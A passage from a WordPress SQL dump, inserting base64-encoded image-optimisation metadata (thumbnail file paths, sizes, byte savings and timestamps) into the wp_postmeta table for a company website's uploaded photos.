C9NUy03NTAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxMSwidGltZSI6MTQ4MzU2NDIwMiwiaWQiOjE3NzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU0NSwidGltZSI6MTQ4MzU2NDIwNiwiaWQiOjE3NzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY2MywidGltZSI6MTQ4MzU2NDIwOSwiaWQiOjE3NzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk2NywidGltZSI6MTQ4MzU2NDIxMywiaWQiOjE3NzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTEsInRpbWUiOjE0ODM1NjQyMTYsImlkIjoxNzcwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29216, 1769, 'wpfc_optimisation_reduction', '26535'); 
INSERT INTO `wp_postmeta` VALUES (29217, 1769, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQyMjAsImlkIjoiMTc2OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzQ1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MjMsInRpbWUiOjE0ODM1NjQyMjQsImlkIjoxNzY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc0NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc0NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc0NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzA1MywidGltZSI6MTQ4MzU2NDIyNywiaWQiOjE3Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzQ1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzU0LCJ0aW1lIjoxNDgzNTY0MjMwLCJpZCI6MTc2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NDUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMyMDgsInRpbWUiOjE0ODM1NjQyMzQsImlkIjoxNzY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc0NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc0NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc0NS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTk2LCJ0aW1lIjoxNDgzNTY0MjM4LCJpZCI6MTc2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NDUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNSwidGltZSI6MTQ4MzU2NDI0MSwiaWQiOjE3Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzQ1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTUsInRpbWUiOjE0ODM1NjQyNDQsImlkIjoxNzY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc0NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc0NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc0NS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg5MiwidGltZSI6MTQ4MzU2NDI0OCwiaWQiOjE3Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NDUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjM5OCwidGltZSI6MTQ4MzU2NDI1MSwiaWQiOjE3Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NDUtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU5NSwidGltZSI6MTQ4MzU2NDI1NCwiaWQiOjE3Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NDUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYzMiwidGltZSI6MTQ4MzU2NDI1OCwiaWQiOjE3Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NDUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk5MCwidGltZSI6MTQ4MzU2NDI2MSwiaWQiOjE3Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NDUtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzQ1LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NDUtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODQsInRpbWUiOjE0ODM1NjQyNjQsImlkIjoxNzY5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29218, 1768, 'wpfc_optimisation_reduction', '27189'); 
INSERT INTO `wp_postmeta` VALUES (29219, 1768, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQyNjksImlkIjoiMTc2OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzMwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MzksInRpbWUiOjE0ODM1NjQyNzIsImlkIjoxNzY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTczMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTczMC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTczMC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzE1MCwidGltZSI6MTQ4MzU2NDI3NiwiaWQiOjE3Njh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzMwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzgxLCJ0aW1lIjoxNDgzNTY0Mjc5LCJpZCI6MTc2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MzAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTM1MjgsInRpbWUiOjE0ODM1NjQyODMsImlkIjoxNzY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTczMC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTczMC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTczMC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjIzLCJ0aW1lIjoxNDgzNTY0Mjg2LCJpZCI6MTc2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MzAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUyMCwidGltZSI6MTQ4MzU2NDI5MCwiaWQiOjE3Njh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzMwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MDAsInRpbWUiOjE0ODM1NjQyOTMsImlkIjoxNzY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTczMC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTczMC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTczMC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTk0NCwidGltZSI6MTQ4MzU2NDI5NiwiaWQiOjE3Njh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MzAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQzNSwidGltZSI6MTQ4MzU2NDMwMCwiaWQiOjE3Njh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCI